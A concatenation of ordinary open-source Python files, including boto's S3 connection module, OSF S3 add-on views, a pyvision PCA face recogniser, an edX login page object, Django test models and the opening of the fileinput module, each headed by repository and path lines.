time.sleep(1)
@then(u'the client should receive {response}')
def step_impl(context, response):
output = context.person1.recv(2048).decode()
context.test.assertIn(response, output)
@then(u'the client socket should be disconnected')
def step_impl(context):
context.person1.sendall("/disconnect".encode())
@given(u'person2 is in the chatroom')
def step_impl(context):
context.person2 = socket.create_connection(('localhost', 3333))
context.person2.sendall('/set name M'.encode())
time.sleep(1)
context.person2.sendall('/set description friend'.encode())
context.person2.sendall('/whoami'.encode())
output = context.person2.recv(1024)
context.test.assertIn('M', output.decode())
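# A hypothetical feature file exercising the steps above (the Given/When/Then
# wording must match the step decorators exactly; the command and response
# values are illustrative):
#
#   Feature: chat server commands
#     Scenario: querying the server for my identity
#       Given I came connected to the chat server as person1
#       When the client sends /whoami
#       Then the client should receive Guest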
|
huanchenz/STX-h-store
|
refs/heads/master
|
third_party/python/boto/s3/connection.py
|
11
|
# Copyright (c) 2006-2010 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import xml.sax
import urllib, base64
import time
import boto.utils
from boto.connection import AWSAuthConnection
from boto import handler
from boto.provider import Provider
from boto.s3.bucket import Bucket
from boto.s3.key import Key
from boto.resultset import ResultSet
from boto.exception import BotoClientError
def check_lowercase_bucketname(n):
"""
Bucket names must not contain uppercase characters. We check for
this by appending a lowercase character and testing with islower().
Note this also covers cases like numeric bucket names with dashes.
>>> check_lowercase_bucketname("Aaaa")
Traceback (most recent call last):
...
BotoClientError: S3Error: Bucket names cannot contain upper-case
characters when using either the sub-domain or virtual hosting calling
format.
>>> check_lowercase_bucketname("1234-5678-9123")
True
>>> check_lowercase_bucketname("abcdefg1234")
True
"""
if not (n + 'a').islower():
raise BotoClientError("Bucket names cannot contain upper-case " \
"characters when using either the sub-domain or virtual " \
"hosting calling format.")
return True
def assert_case_insensitive(f):
def wrapper(*args, **kwargs):
if len(args) == 3 and check_lowercase_bucketname(args[2]):
pass
return f(*args, **kwargs)
return wrapper
class _CallingFormat:
def build_url_base(self, connection, protocol, server, bucket, key=''):
url_base = '%s://' % protocol
url_base += self.build_host(server, bucket)
url_base += connection.get_path(self.build_path_base(bucket, key))
return url_base
def build_host(self, server, bucket):
if bucket == '':
return server
else:
return self.get_bucket_server(server, bucket)
def build_auth_path(self, bucket, key=''):
key = boto.utils.get_utf8_value(key)
path = ''
if bucket != '':
path = '/' + bucket
return path + '/%s' % urllib.quote(key)
def build_path_base(self, bucket, key=''):
key = boto.utils.get_utf8_value(key)
return '/%s' % urllib.quote(key)
class SubdomainCallingFormat(_CallingFormat):
@assert_case_insensitive
def get_bucket_server(self, server, bucket):
return '%s.%s' % (bucket, server)
class VHostCallingFormat(_CallingFormat):
@assert_case_insensitive
def get_bucket_server(self, server, bucket):
return bucket
class OrdinaryCallingFormat(_CallingFormat):
def get_bucket_server(self, server, bucket):
return server
def build_path_base(self, bucket, key=''):
key = boto.utils.get_utf8_value(key)
path_base = '/'
if bucket:
path_base += "%s/" % bucket
return path_base + urllib.quote(key)
class ProtocolIndependentOrdinaryCallingFormat(OrdinaryCallingFormat):
def build_url_base(self, connection, protocol, server, bucket, key=''):
url_base = '//'
url_base += self.build_host(server, bucket)
url_base += connection.get_path(self.build_path_base(bucket, key))
return url_base
class Location:
DEFAULT = '' # US Classic Region
EU = 'EU'
USWest = 'us-west-1'
APNortheast = 'ap-northeast-1'
APSoutheast = 'ap-southeast-1'
class S3Connection(AWSAuthConnection):
DefaultHost = 's3.amazonaws.com'
QueryString = 'Signature=%s&Expires=%d&AWSAccessKeyId=%s'
def __init__(self, aws_access_key_id=None, aws_secret_access_key=None,
is_secure=True, port=None, proxy=None, proxy_port=None,
proxy_user=None, proxy_pass=None,
host=DefaultHost, debug=0, https_connection_factory=None,
calling_format=SubdomainCallingFormat(), path='/', provider='aws',
bucket_class=Bucket):
self.calling_format = calling_format
self.bucket_class = bucket_class
AWSAuthConnection.__init__(self, host,
aws_access_key_id, aws_secret_access_key,
is_secure, port, proxy, proxy_port, proxy_user, proxy_pass,
debug=debug, https_connection_factory=https_connection_factory,
path=path, provider=provider)
def _required_auth_capability(self):
return ['s3']
def __iter__(self):
for bucket in self.get_all_buckets():
yield bucket
def __contains__(self, bucket_name):
return not (self.lookup(bucket_name) is None)
def set_bucket_class(self, bucket_class):
"""
Set the Bucket class associated with this connection. By default, this
would be the boto.s3.bucket.Bucket class but if you want to subclass that
for some reason this allows you to associate your new class.
:type bucket_class: class
:param bucket_class: A subclass of Bucket that can be more specific
"""
self.bucket_class = bucket_class
def build_post_policy(self, expiration_time, conditions):
"""
Taken from the AWS book Python examples and modified for use with boto
"""
assert type(expiration_time) == time.struct_time, \
'Policy document must include a valid expiration Time object'
# Convert conditions object mappings to condition statements
return '{"expiration": "%s",\n"conditions": [%s]}' % \
(time.strftime(boto.utils.ISO8601, expiration_time), ",".join(conditions))
def build_post_form_args(self, bucket_name, key, expires_in = 6000,
acl = None, success_action_redirect = None, max_content_length = None,
http_method = "http", fields=None, conditions=None):
"""
Taken from the AWS book Python examples and modified for use with boto
This only returns the arguments required for the post form, not the actual form.
This does not return the file input field, which also needs to be added.
:param bucket_name: Bucket to submit to
:type bucket_name: string
:param key: Key name, optionally add ${filename} to the end to attach the submitted filename
:type key: string
:param expires_in: Time (in seconds) before this expires, defaults to 6000
:type expires_in: integer
:param acl: ACL rule to use, if any
:type acl: :class:`boto.s3.acl.ACL`
:param success_action_redirect: URL to redirect to on success
:type success_action_redirect: string
:param max_content_length: Maximum size for this file
:type max_content_length: integer
:type http_method: string
:param http_method: HTTP Method to use, "http" or "https"
:rtype: dict
:return: A dictionary containing field names/values as well as a url to POST to
.. code-block:: python
{
"action": action_url_to_post_to,
"fields": [
{
"name": field_name,
"value": field_value
},
{
"name": field_name2,
"value": field_value2
}
]
}
"""
if fields == None:
fields = []
if conditions == None:
conditions = []
expiration = time.gmtime(int(time.time() + expires_in))
# Generate policy document
conditions.append('{"bucket": "%s"}' % bucket_name)
if key.endswith("${filename}"):
conditions.append('["starts-with", "$key", "%s"]' % key[:-len("${filename}")])
else:
conditions.append('{"key": "%s"}' % key)
if acl:
conditions.append('{"acl": "%s"}' % acl)
fields.append({ "name": "acl", "value": acl})
if success_action_redirect:
conditions.append('{"success_action_redirect": "%s"}' % success_action_redirect)
fields.append({ "name": "success_action_redirect", "value": success_action_redirect})
if max_content_length:
conditions.append('["content-length-range", 0, %i]' % max_content_length)
fields.append({"name":'content-length-range', "value": "0,%i" % max_content_length})
policy = self.build_post_policy(expiration, conditions)
# Add the base64-encoded policy document as the 'policy' field
policy_b64 = base64.b64encode(policy)
fields.append({"name": "policy", "value": policy_b64})
# Add the AWS access key as the 'AWSAccessKeyId' field
fields.append({"name": "AWSAccessKeyId", "value": self.aws_access_key_id})
# Add the signature for the encoded policy document as the 'signature' field
signature = self._auth_handler.sign_string(policy_b64)
fields.append({"name": "signature", "value": signature})
fields.append({"name": "key", "value": key})
# HTTPS protocol will be used if the secure HTTP option is enabled.
url = '%s://%s/' % (http_method, self.calling_format.build_host(self.server_name(), bucket_name))
return {"action": url, "fields": fields}
def generate_url(self, expires_in, method, bucket='', key='', headers=None,
query_auth=True, force_http=False, response_headers=None):
if not headers:
headers = {}
expires = int(time.time() + expires_in)
auth_path = self.calling_format.build_auth_path(bucket, key)
auth_path = self.get_path(auth_path)
# Arguments to override response headers become part of the canonical
# string to be signed.
if response_headers:
response_hdrs = ["%s=%s" % (k, v) for k, v in
response_headers.items()]
delimiter = '?' if '?' not in auth_path else '&'
auth_path = "%s%s%s" % (auth_path, delimiter, '&'.join(response_hdrs))
else:
response_headers = {}
c_string = boto.utils.canonical_string(method, auth_path, headers,
expires, self.provider)
b64_hmac = self._auth_handler.sign_string(c_string)
encoded_canonical = urllib.quote_plus(b64_hmac)
self.calling_format.build_path_base(bucket, key)
if query_auth:
query_part = '?' + self.QueryString % (encoded_canonical, expires,
self.aws_access_key_id)
# The response headers must also be GET parameters in the URL.
headers.update(response_headers)
hdrs = [ '%s=%s'%(name, urllib.quote(val)) for name,val in headers.items() ]
q_str = '&'.join(hdrs)
if q_str:
query_part += '&' + q_str
else:
query_part = ''
if force_http:
protocol = 'http'
port = 80
else:
protocol = self.protocol
port = self.port
return self.calling_format.build_url_base(self, protocol, self.server_name(port),
bucket, key) + query_part
def get_all_buckets(self, headers=None):
response = self.make_request('GET', headers=headers)
body = response.read()
if response.status > 300:
raise self.provider.storage_response_error(
response.status, response.reason, body)
rs = ResultSet([('Bucket', self.bucket_class)])
h = handler.XmlHandler(rs, self)
xml.sax.parseString(body, h)
return rs
def get_canonical_user_id(self, headers=None):
"""
Convenience method that returns the "CanonicalUserID" of the user whose credentials
are associated with the connection. The only way to get this value is to do a GET
request on the service which returns all buckets associated with the account. As part
of that response, the canonical userid is returned. This method simply does all of
that and then returns just the user id.
:rtype: string
:return: A string containing the canonical user id.
"""
rs = self.get_all_buckets(headers=headers)
return rs.ID
def get_bucket(self, bucket_name, validate=True, headers=None):
bucket = self.bucket_class(self, bucket_name)
if validate:
bucket.get_all_keys(headers, maxkeys=0)
return bucket
def lookup(self, bucket_name, validate=True, headers=None):
try:
bucket = self.get_bucket(bucket_name, validate, headers=headers)
except:
bucket = None
return bucket
def create_bucket(self, bucket_name, headers=None,
location=Location.DEFAULT, policy=None):
"""
Creates a new located bucket. By default it's in the USA. You can pass
Location.EU to create a European bucket.
:type bucket_name: string
:param bucket_name: The name of the new bucket
:type headers: dict
:param headers: Additional headers to pass along with the request to AWS.
:type location: :class:`boto.s3.connection.Location`
:param location: The location of the new bucket
:type policy: :class:`boto.s3.acl.CannedACLStrings`
:param policy: A canned ACL policy that will be applied to the new key in S3.
"""
check_lowercase_bucketname(bucket_name)
if policy:
if headers:
headers[self.provider.acl_header] = policy
else:
headers = {self.provider.acl_header : policy}
if location == Location.DEFAULT:
data = ''
else:
data = '<CreateBucketConfiguration><LocationConstraint>' + \
location + '</LocationConstraint></CreateBucketConfiguration>'
response = self.make_request('PUT', bucket_name, headers=headers,
data=data)
body = response.read()
if response.status == 409:
raise self.provider.storage_create_error(
response.status, response.reason, body)
if response.status == 200:
return self.bucket_class(self, bucket_name)
else:
raise self.provider.storage_response_error(
response.status, response.reason, body)
def delete_bucket(self, bucket, headers=None):
response = self.make_request('DELETE', bucket, headers=headers)
body = response.read()
if response.status != 204:
raise self.provider.storage_response_error(
response.status, response.reason, body)
def make_request(self, method, bucket='', key='', headers=None, data='',
query_args=None, sender=None, override_num_retries=None):
if isinstance(bucket, self.bucket_class):
bucket = bucket.name
if isinstance(key, Key):
key = key.name
path = self.calling_format.build_path_base(bucket, key)
boto.log.debug('path=%s' % path)
auth_path = self.calling_format.build_auth_path(bucket, key)
boto.log.debug('auth_path=%s' % auth_path)
host = self.calling_format.build_host(self.server_name(), bucket)
if query_args:
path += '?' + query_args
boto.log.debug('path=%s' % path)
auth_path += '?' + query_args
boto.log.debug('auth_path=%s' % auth_path)
return AWSAuthConnection.make_request(self, method, path, headers,
data, host, auth_path, sender,
override_num_retries=override_num_retries)
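# A minimal usage sketch (credentials and names are placeholders):
#
#   conn = S3Connection('<access_key>', '<secret_key>')
#   bucket = conn.create_bucket('my-lowercase-bucket', location=Location.EU)
#   url = conn.generate_url(3600, 'GET', bucket='my-lowercase-bucket',
#                           key='some/key', query_auth=True)
#   for b in conn:  # __iter__ yields every bucket on the account
#       print b.name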
|
billyhunt/osf.io
|
refs/heads/develop
|
website/addons/s3/views/config.py
|
13
|
import httplib
from flask import request
from framework.exceptions import HTTPError
from framework.auth.decorators import must_be_logged_in
from website.addons.s3 import utils
from website.project.decorators import must_have_addon
from website.project.decorators import must_have_permission
from website.project.decorators import must_not_be_registration
@must_be_logged_in
def s3_post_user_settings(auth, **kwargs):
user_addon = auth.user.get_or_add_addon('s3')
try:
access_key = request.json['access_key']
secret_key = request.json['secret_key']
except KeyError:
raise HTTPError(httplib.BAD_REQUEST)
if not (access_key and secret_key):
return {
'message': ('All the fields above are required.')
}, httplib.BAD_REQUEST
if not utils.can_list(access_key, secret_key):
return {
'message': ('Unable to list buckets.\n'
'Listing buckets is a required permission that can be granted via IAM')
}, httplib.BAD_REQUEST
user_addon.access_key = access_key
user_addon.secret_key = secret_key
user_addon.save()
@must_have_permission('write')
@must_have_addon('s3', 'node')
def s3_authorize_node(auth, node_addon, **kwargs):
try:
access_key = request.json['access_key']
secret_key = request.json['secret_key']
except KeyError:
raise HTTPError(httplib.BAD_REQUEST)
if not (access_key and secret_key):
return {
'message': 'All the fields above are required.'
}, httplib.BAD_REQUEST
if not utils.can_list(access_key, secret_key):
return {
'message': ('Unable to list buckets.\n'
'Listing buckets is a required permission that can be granted via IAM')
}, httplib.BAD_REQUEST
user_addon = auth.user.get_or_add_addon('s3')
user_addon.access_key = access_key
user_addon.secret_key = secret_key
user_addon.save()
node_addon.authorize(user_addon, save=True)
return node_addon.to_json(auth.user)
@must_be_logged_in
@must_have_permission('write')
@must_have_addon('s3', 'node')
@must_have_addon('s3', 'user')
def s3_node_import_auth(auth, node_addon, user_addon, **kwargs):
node_addon.authorize(user_addon, save=True)
return node_addon.to_json(auth.user)
@must_have_permission('write')
@must_have_addon('s3', 'user')
@must_have_addon('s3', 'node')
@must_not_be_registration
def s3_post_node_settings(node, auth, user_addon, node_addon, **kwargs):
# Fail if user settings not authorized
if not user_addon.has_auth:
raise HTTPError(httplib.BAD_REQUEST)
# If authorized, only owner can change settings
if node_addon.has_auth and node_addon.user_settings.owner != auth.user:
raise HTTPError(httplib.BAD_REQUEST)
# Claiming the node settings
if not node_addon.user_settings:
node_addon.user_settings = user_addon
bucket = request.json.get('s3_bucket', '')
if not utils.bucket_exists(user_addon.access_key, user_addon.secret_key, bucket):
error_message = ('We are having trouble connecting to that bucket. '
'Try a different one.')
return {'message': error_message}, httplib.BAD_REQUEST
if bucket != node_addon.bucket:
# Update node settings
node_addon.bucket = bucket
node_addon.save()
node.add_log(
action='s3_bucket_linked',
params={
'node': node._id,
'project': node.parent_id,
'bucket': node_addon.bucket,
},
auth=auth,
)
return node_addon.to_json(auth.user)
@must_be_logged_in
@must_have_addon('s3', 'node')
@must_have_permission('write')
@must_not_be_registration
def s3_get_node_settings(auth, node_addon, **kwargs):
result = node_addon.to_json(auth.user)
result['urls'] = utils.serialize_urls(node_addon, auth.user)
return {'result': result}
@must_be_logged_in
@must_have_addon('s3', 'node')
@must_have_addon('s3', 'user')
@must_have_permission('write')
@must_not_be_registration
def s3_get_bucket_list(auth, node_addon, user_addon, **kwargs):
return {
'buckets': utils.get_bucket_names(user_addon)
}
@must_have_permission('write')
@must_have_addon('s3', 'node')
@must_not_be_registration
def s3_delete_node_settings(auth, node_addon, **kwargs):
node_addon.deauthorize(auth=auth, save=True)
return node_addon.to_json(auth.user)
@must_be_logged_in
@must_have_addon('s3', 'user')
def s3_delete_user_settings(user_addon, auth, **kwargs):
user_addon.revoke_auth(auth=auth, save=True)
user_addon.delete()
user_addon.save()
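# The JSON payloads expected by the views above (field names taken from the
# request.json lookups; the URL routes are registered elsewhere and omitted):
#
#   s3_post_user_settings / s3_authorize_node:
#       {"access_key": "<AWS access key>", "secret_key": "<AWS secret key>"}
#   s3_post_node_settings:
#       {"s3_bucket": "<bucket name>"}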
|
cosenal/waterbutler
|
refs/heads/develop
|
waterbutler/providers/box/settings.py
|
7
|
try:
from waterbutler import settings
except ImportError:
settings = {}
config = settings.get('BOX_PROVIDER_CONFIG', {})
BASE_URL = config.get('BASE_URL', 'https://api.box.com/2.0')
BASE_UPLOAD_URL = config.get('BASE_CONTENT_URL', 'https://upload.box.com/api/2.0')
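# A hypothetical override in waterbutler's settings module (keys exactly as
# read above; note that BASE_UPLOAD_URL is populated from 'BASE_CONTENT_URL'):
#
#   BOX_PROVIDER_CONFIG = {
#       'BASE_URL': 'https://api.box.com/2.0',
#       'BASE_CONTENT_URL': 'https://upload.box.com/api/2.0',
#   }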
|
mikeseven/pyvision
|
refs/heads/master
|
src/pyvision/face/PCA.py
|
3
|
# PyVision License
#
# Copyright (c) 2006-2008 David S. Bolme
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither name of copyright holders nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#import os.path
#from PIL.Image import ANTIALIAS
#import scipy as sp
import numpy as np
import os
import unittest
#from scipy.signal import fft2
from pyvision.face.FaceRecognizer import FaceRecognizer
from pyvision.analysis.FaceAnalysis import FaceRecognitionTest
import pyvision.vector.PCA
#from pyvision.other.normalize import *
#from pyvision.types.img import Image
#from pyvision.types.Point import Point
from pyvision.analysis.face import EyesFile
#from pyvision.analysis.roc import *
#from pyvision.types.Affine import *
import pyvision as pv
PCA_L1 = 1
PCA_L2 = 2
PCA_COS = 3
PCA_NO_NORM = 1
PCA_MEAN_STD_NORM = 2
PCA_MEAN_UNIT_NORM = 3
PCA_UNIT_NORM = 4
class PCA(FaceRecognizer):
''' This is a basic implementation of PCA'''
def __init__(self, face_size=(128,128), left_eye=pv.Point(32,52), right_eye=pv.Point(96,52), normalize=PCA_MEAN_STD_NORM, measure=PCA_COS, whiten=True, drop_front=2, basis_vectors=100):
'''Create a PCA classifier'''
FaceRecognizer.__init__(self)
self.face_size = face_size
self.pca = pyvision.vector.PCA.PCA()
self.norm = normalize
self.trained = False
self.whiten = whiten
self.drop_front = drop_front
self.basis_vectors = basis_vectors
self.measure = measure
self.left_eye = left_eye
self.right_eye = right_eye
def cropFace(self,im,eyes):
left,right = eyes
affine = pv.AffineFromPoints(left,right,self.left_eye,self.right_eye,self.face_size)
im = affine.transformImage(im)
return im
#def addTraining(self,img,rect=None,eyes=None):
# ''' '''
# assert not self.trained
#
# img = self.cropFace(img,eyes)
# vec = self.computeVector(img)
# self.pca.addFeature(vec)
def computeFaceRecord(self,img,rect=None,eyes=None):
'''Given an image and face detection box, compute a face identification record'''
assert self.trained
img = self.cropFace(img,eyes)
vec = self.computeVector(img)
fir = self.pca.project(vec,whiten=True)
if self.measure == PCA_COS:
scale = np.sqrt((fir*fir).sum())
fir = (1.0/scale)*fir
return fir
def computeVector(self,img):
'''Creates a vector from a face'''
#face = img.asPIL().crop(rect.box()).resize(self.face_size,ANTIALIAS)
vec = img.asMatrix2D().flatten()
if self.norm == PCA_MEAN_STD_NORM:
vec = pv.meanStd(vec)
if self.norm == PCA_MEAN_UNIT_NORM:
vec = pv.meanUnit(vec)
if self.norm == PCA_UNIT_NORM:
vec = pv.unit(vec)
return vec
def train(self):
'''Train the PCA classifier'''
assert self.trained == False
for img,_,eyes,_ in self.training_data:
img = self.cropFace(img,eyes)
vec = self.computeVector(img)
self.pca.addFeature(vec)
self.pca.train( drop_front=self.drop_front, number=self.basis_vectors)
self.trained = True
def similarity(self,fir1,fir2):
'''Compute the similarity of two faces'''
assert self.trained == True
if self.measure == PCA_L1:
return (np.abs(fir1-fir2)).sum()
if self.measure == PCA_L2:
return np.sqrt(((fir1-fir2)*(fir1-fir2)).sum())
if self.measure == PCA_COS:
return (fir1*fir2).sum()
raise NotImplementedError("Unknown distance measure: %d"%self.measure)
def getBasis(self):
basis = self.pca.getBasis()
images = []
print basis.shape
r,_ = basis.shape
for i in range(r):
im = basis[i,:]
im = im.reshape(self.face_size)
im = pv.Image(im)
images.append(im)
print len(images)
return images
SCRAPS_FACE_DATA = os.path.join(pyvision.__path__[0],"data","csuScrapShots")
PCA_SIZE = (64,64)
class _TestFacePCA(unittest.TestCase):
def setUp(self):
self.images = []
self.names = []
self.eyes = EyesFile(os.path.join(SCRAPS_FACE_DATA,"coords.txt"))
for filename in self.eyes.files():
img = pv.Image(os.path.join(SCRAPS_FACE_DATA, filename + ".pgm"))
self.images.append(img)
self.names.append(filename)
self.assert_( len(self.images) == 173 )
def test_pca_scraps(self):
face_test = FaceRecognitionTest.FaceRecognitionTest(name='PCA_CSUScraps',score_type=FaceRecognitionTest.SCORE_TYPE_HIGH)
pca = PCA(drop_front=2,basis_vectors=55)
for im_name in self.eyes.files():
im = pv.Image(os.path.join(SCRAPS_FACE_DATA, im_name + ".pgm"))
rect = self.eyes.getFaces(im_name)
eyes = self.eyes.getEyes(im_name)
pca.addTraining(im,rect=rect[0],eyes=eyes[0])
pca.train()
face_records = {}
for im_name in self.eyes.files():
im = pv.Image(os.path.join(SCRAPS_FACE_DATA, im_name + ".pgm"))
rect = self.eyes.getFaces(im_name)
eyes = self.eyes.getEyes(im_name)
fr = pca.computeFaceRecord(im,rect=rect[0],eyes=eyes[0])
face_records[im_name] = fr
for i_name in face_records.keys():
scores = []
for j_name in face_records.keys():
similarity = pca.similarity(face_records[i_name],face_records[j_name])
scores.append((j_name,similarity))
face_test.addSample(i_name,scores)
#print face_test.rank1_bounds
self.assertAlmostEqual(face_test.rank1_rate,0.43930635838150289)
self.assertAlmostEqual(face_test.rank1_bounds[0],0.3640772723094895)
self.assertAlmostEqual(face_test.rank1_bounds[1],0.51665118592791259)
roc = face_test.getROCAnalysis()
# Test based of fpr=0.01
_ = roc.getFAR(far=0.01)
#TODO: does not work...
#self.assertAlmostEqual(1.0-roc_point.frr,0.16481069042316257)
# Test the equal error rate
#fp,tp,th = roc.findEqualError()
#self.assertAlmostEqual(tp,0.68819599109131402)
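# A minimal usage sketch mirroring the test above (images and eye coordinates
# are illustrative; addTraining is inherited from FaceRecognizer):
#
#   pca = PCA(drop_front=2, basis_vectors=55)
#   for im, rect, eyes in training_set:  # hypothetical iterable
#       pca.addTraining(im, rect=rect, eyes=eyes)
#   pca.train()
#   fir1 = pca.computeFaceRecord(im1, eyes=eyes1)
#   fir2 = pca.computeFaceRecord(im2, eyes=eyes2)
#   score = pca.similarity(fir1, fir2)  # higher means more similar for PCA_COS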
|
Livit/Livit.Learn.EdX
|
refs/heads/labster/develop
|
common/test/acceptance/pages/lms/login.py
|
205
|
"""
Login page for the LMS.
"""
from bok_choy.page_object import PageObject
from bok_choy.promise import EmptyPromise
from . import BASE_URL
from .dashboard import DashboardPage
class LoginPage(PageObject):
"""
Login page for the LMS.
"""
url = BASE_URL + "/login"
def is_browser_on_page(self):
return any([
'log in' in title.lower()
for title in self.q(css='span.title-super').text
])
def login(self, email, password):
"""
Attempt to log in using `email` and `password`.
"""
self.provide_info(email, password)
self.submit()
def provide_info(self, email, password):
"""
Fill in login info.
`email` and `password` are the user's credentials.
"""
EmptyPromise(self.q(css='input#email').is_present, "Click ready").fulfill()
EmptyPromise(self.q(css='input#password').is_present, "Click ready").fulfill()
self.q(css='input#email').fill(email)
self.q(css='input#password').fill(password)
self.wait_for_ajax()
def submit(self):
"""
Submit the login info and wait for the dashboard to load.
"""
self.q(css='button#submit').first.click()
# The next page is the dashboard; make sure it loads
dashboard = DashboardPage(self.browser)
dashboard.wait_for_page()
return dashboard
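# A minimal usage sketch from a bok-choy test (credentials are placeholders;
# visit() is inherited from PageObject):
#
#   page = LoginPage(browser)
#   page.visit()
#   page.login("user@example.com", "password")  # waits for the dashboard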
|
campbe13/openhatch
|
refs/heads/master
|
vendor/packages/Django/tests/regressiontests/generic_views/models.py
|
111
|
from django.core.urlresolvers import reverse
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Artist(models.Model):
name = models.CharField(max_length=100)
class Meta:
ordering = ['name']
verbose_name = 'professional artist'
verbose_name_plural = 'professional artists'
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('artist_detail', kwargs={'pk': self.id})
@python_2_unicode_compatible
class Author(models.Model):
name = models.CharField(max_length=100)
slug = models.SlugField()
class Meta:
ordering = ['name']
def __str__(self):
return self.name
@python_2_unicode_compatible
class Book(models.Model):
name = models.CharField(max_length=300)
slug = models.SlugField()
pages = models.IntegerField()
authors = models.ManyToManyField(Author)
pubdate = models.DateField()
class Meta:
ordering = ['-pubdate']
def __str__(self):
return self.name
class Page(models.Model):
content = models.TextField()
template = models.CharField(max_length=300)
class BookSigning(models.Model):
event_date = models.DateTimeField()
|
flyfei/python-for-android
|
refs/heads/master
|
python3-alpha/python3-src/Lib/fileinput.py
|
46
|
"""Helper class to quickly write a loop over all standard input files.
Typical use is:
import fileinput
for line in fileinput.input():
process(line)
This iterates over the lines of all files listed in sys.argv[1:],
defaulting to sys.stdin if the list is empty. If a filename is '-' it
is also replaced by sys.stdin. To specify an alternative list of
filenames, pass it as the argument to input(). A single file name is
also allowed.
Functions filename(), lineno() return the filename and cumulative line
number of the line that has just been read; filelineno() returns its
line number in the current file; isfirstline() returns true iff the
line just read is the first line of its file; isstdin() returns true
iff the line was read from sys.stdin. Function nextfile() closes the
current file so that the next iteration will read the first line from
the next file (if any); lines not read from the file will not count
towards the cumulative line count; the filename is not changed until
after the first line of the next file has been read. Function close()
closes the sequence.
Before any lines have been read, filename() returns None and both line
numbers are zero; nextfile() has no effect. After all lines have been
read, filename() and the line number functions return the values
pertaining to the last line read; nextfile() has no effect.
All files are opened in text mode by default, you can override this by
setting the mode parameter to input() or FileInput.__init__().
If an I/O error occurs during opening or reading a file, the IOError
exception is raised.
If sys.stdin is used more than once, the second and further use will
return no lines, except perhaps for interactive use, or if it has been
explicitly reset (e.g. using sys.stdin.seek(0)).
Empty files are opened and immediately closed; the only time their
presence in the list of filenames is noticeable at all is when the
last file opened is empty.
It is possible that the last line of a file doesn't end in a newline
character; otherwise lines are returned including the trailing
newline.
Class FileInput is the implementation; its methods filename(),
lineno(), filelineno(), isfirstline(), isstdin(), nextfile() and close()
correspond to the functions in the module. In addition it has a
readline() method which returns the next input line, and a
__getitem__() method which implements the sequence behavior. The
sequence must be accessed in strictly sequential order; sequence
access and readline() cannot be mixed.
Optional in-place filtering: if the keyword argument inplace=1 is
passed to input() or to the FileInput constructor, the file is moved
to a backup file and standard output is directed to the input file.
This makes it possible to write a filter that rewrites its input file
in place. If the keyword argument backup=".<some extension>" is also
given, it specifies the extension for the backup file, and the backup
file remains around; by default, the extension is ".bak" and it is
deleted when the output file is closed. In-place filtering is
disabled when standard input is read. XXX The current implementation
does not work for MS-DOS 8+3 filesystems.
Performance: this module is unfortunately one of the slower ways of
processing large numbers of input lines. Nevertheless, a significant
speed-up has been obtained by using readlines(bufsize) instead of
readline(). A new keyword argument, bufsize=N, is present on the
input() function and the FileInput() class to override the default
buffer size.
XXX Possible additions:
- optional getopt argument processing
- isatty()
- read(), read(size), even readlines()
"""
import sys, os
__all__ = ["input", "close", "nextfile", "filename", "lineno", "filelineno",
"isfirstline", "isstdin", "FileInput"]
_state = None
DEFAULT_BUFSIZE = 8*1024
def input(files=None, inplace=False, backup="", bufsize=0,
mode="r", openhook=None):
"""input(files=None, inplace=False, backup="", bufsize=0, \
mode="r", openhook=None)
Create an instance of the FileInput class. The instance will be used
as global state for the functions of this module, and is also returned
to use during iteration. The parameters to this function will be passed
along to the constructor of the FileInput class.
"""
global _state
if _state and _state._file:
raise RuntimeError("input() already active")
_state = FileInput(files, inplace, backup, bufsize, mode, openhook)
return _state
def close():
"""Close the sequence."""
global _state
state = _state
_state = None
if state:
state.close()
def nextfile():
"""
Close the current file so that the next iteration will read the first
line from the next file (if any); lines not read from the file will
not count towards the cumulative line count. The filename is not
changed until after the first line of the next file has been read.
Before the first line has been read, this function has no effect;
it cannot be used to skip the first file. After the last line of the
last file has been read, this function has no effect.
"""
if not _state:
raise RuntimeError("no active input()")
return _state.nextfile()
def filename():
"""
Return the name of the file currently being read.
Before the first line has been read, returns None.
